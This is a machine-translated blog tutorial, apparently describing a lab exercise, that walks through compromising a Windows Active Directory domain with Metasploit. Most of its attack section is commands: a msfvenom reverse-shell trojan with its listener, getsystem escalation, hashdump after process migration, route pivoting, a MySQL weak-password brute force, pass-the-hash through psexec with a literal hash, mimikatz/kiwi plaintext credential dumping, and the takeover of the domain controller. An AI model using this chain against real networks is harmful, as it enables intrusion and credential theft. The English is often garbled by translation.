Simple domain penetration

Refer to the connection of master

Intranet penetration - complete domain penetration

Some basic knowledge


A computer domain is a collection of computers with security boundaries. Computers in the same domain have established a trust relationship with each other. Accessing other machines in the domain no longer requires the permission of the accessed machine.

Domain controller:

Domain Controller refers to that in the "domain" mode, at least one server is responsible for the authentication of each computer and user connected to the network. It is equivalent to the gatekeeper of a unit. It is called "Domain Controller (abbreviated as DC)".

Active Directory:

Active Directory is a [directory service] for Windows Standard Server, Windows Enterprise Server and Windows Datacenter Server. (Active Directory cannot run on Windows Web Server, but it can manage computers running Windows Web Server.) Active Directory stores information about network objects and makes it easy for administrators and users to find and use this information. Active Directory uses a structured data storage method as the basis for logical hierarchical organization of directory information.

Microsoft Active Directory service is the core component of Windows platform. It provides a powerful means for users to manage the identification and relationship of various components of the network environment

Domain user:

A domain is the logic of a network object Organizational unit , domain is not only the logical organization unit of intranet under the environment of Windows network operating system, but also the core of Internet logic Organizational unit. These objects include users, groups, and computers. All objects in the domain are stored in Active Directory. Active Directory can reside in one or more of a domain domain controller Down. When a domain establishes a trust relationship with other domains, the two domains can not only manage each other as needed, but also allocate equipment resources such as files and printers across the network, so as to realize the sharing and management of network resources between different domains.

Establish domain environment

For environment establishment, please refer to

Domain penetration

Knowledge points: Trojan horse generation & MSF Online

From the above figure, we can see that there are three hosts in this domain. The domain control host and win2003 do not have redundant network cards, that is, they cannot access the external network through the network card they own. However, there is a domain member host win2008 with two network cards, one of which can communicate with the external network, and our kali can access it

First, we generate a Trojan horse file on it, then we can upload the Trojan horse through the host of our getshell, and then execute it, and we can listen to it on msfconsole

kali generates Trojan horse (under root permission)


msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=12345 -f exe >/root/shell.exe 

kali listens on its 12345 port


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost
set lport 12345

Execute the Trojan horse on the domain member host win2008 and successfully launch msf

Knowledge point: simple right raising

Try a simple lifting operation

meterpreter > getprivs
 Try your best to raise the right
meterpreter > getsystem
 Try various attacks to extract

After using the getsystem instruction, the right is successfully raised

Knowledge points: information collection & host detection

information gathering
meterpreter >shell
chcp 65001 (Avoid the generation of garbled characters, but sometimes useful and not applicable to all situations)
ipconfig	/all  Query the network card details of the host
net time /domain   View the primary domain of the current host
tasklsit    Query process list
systeminfo	View patch list
exit   		(Exit the current terminal window and go to meterpreter)

Lists the network cards that currently control the host

run post/multi/manage/autoroute

Detect other hosts in the intranet of the control host

You can ping the controlled host to detect whether other hosts exist

meterpreter >run post/multi/gather/ping_sweep RHOSTS=

Combined with the above, the dns server of obtained by executing ipconfig /all is It can be basically determined that is domain control

And the domain is chujhss com

Knowledge points: setting routes

After that, we can set a route for our msfconsole (add the network card of our domain member win2008 to msfconsole)

meterpreter >background						
msf6 post(multi/manage/autoroute) > route add 1	
Will this ip Add to msfconsole Up, make kali Can access other intranet hosts
msf6 post(multi/manage/autoroute) > use scanner/portscan/tcp
 Scan this module using port
msf6 auxiliary(scanner/portscan/tcp) > set rhosts,
Set the to scan ip,Check what ports are open on it

Database login module authorization (incomplete and failed)

It is found that ports 3389 and 3306 are opened on the host ip: The two ports correspond to remote desktop and mysql database respectively

You can try mysql weak password login first

use auxiliary/scanner/mysql/mysql_login 
msf6 auxiliary(scanner/mysql/mysql_login)  > set rhosts
msf6 auxiliary(scanner/mysql/mysql_login)  > set username root
msf6 auxiliary(scanner/mysql/mysql_login)  > set pass_file top500.txt

But I didn't do this experiment (when the external connection of the database is turned on, the password of the database is 123456, but it can't be connected all the time)

Because the database login cannot be connected, the right raising of win2003 database was not successful

But looking back, we have obtained the system permission of domain member win2008, so we can use hash delivery attack or kiwi to directly obtain the plaintext password on the host

hash delivery attack

Migration Trojan

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Prompt the following information to explain that we need to migrate the process. We need to migrate the back door to a process executed by the system, generally to explorer Just above exe

meterpreter > hashdump

Migrate our backdoor pid to explorer Exe

meterpreter > migrate 2740
meterpreter > hashdump

After successfully obtaining the password hash value of the administrator, we can use this hash value to carry out horizontal attacks (the second half is the password hash)

Hash delivery attack

meterpreter > background 
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhost
set SMBPass aad3b435b51404eeaad3b435b51404ee:f0d9e79641bfd8fb6d7b01fa4fb3d606
set SMBUser administrator

Win domain member win2003

Successfully obtained and the permission is system permission

The final task is to get the domain control host

kiwi use

mimikatz used before and kiwi now obtains the plaintext password of 2008

For specific kiwi use, please refer to the master's

meterpreter > load kiwi						load kiwi modular
meterpreter > creds_all						Get the plaintext password of this machine		

Take down the domain control host

This is the plaintext password (I'm sorry to type a code, ha ha ha)


use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set RHOST
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
msf6 exploit(windows/smb/psexec) > set SMBDomain chujhss
msf6 exploit(windows/smb/psexec) > set SMBPass 123456   (Clear text password above)

Finally, we get the permission of domain control

In this experiment, I didn't solve the problem of database login module. It's a bit old shell, but it's still very helpful for me as a whole. I hope everyone can write a smooth letter when learning intranet!

Supplementary knowledge: other modules for obtaining passwords

Grab the password of automatic login

run windows/gather/credentials/windows_autologin

You can use this command to query hashdump without authorization

run windows/gather/smart_hashdump

Keywords: security Web Security

Added by jkohns on Sat, 12 Feb 2022 07:32:03 +0200